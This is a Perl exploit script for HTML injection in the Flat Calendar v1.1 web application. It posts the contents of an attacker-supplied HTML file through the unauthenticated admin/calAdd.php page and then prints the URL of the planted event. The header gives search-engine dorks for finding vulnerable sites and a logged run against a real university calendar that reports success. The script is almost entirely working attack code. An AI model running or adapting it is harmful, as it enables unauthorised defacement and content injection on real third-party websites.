#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://localhost / index.html ZoRLu
#Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://jcbc.jesus.cam.ac.uk
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;
sub hlp() {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl $0 http://target.com /calender_path/ indexfile nickname\n";
print "Exam1: perl $0 http://localhost / index.html ZoRLu\n";
print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu\n";
}
if(@ARGV != 4) {
hlp();
exit();
}
my $ua = LWP::UserAgent->new;
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";
print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];
if (open(my $fh, $index)) {
while (my $row = <$fh>) {
chomp $row;
my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];
my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";
my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;
my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
}
else {
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
}
else {
print "[-] Exploit Failed";
}
}
else {
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {
sleep(1);
die ("[-] NotFound: $index\n");
}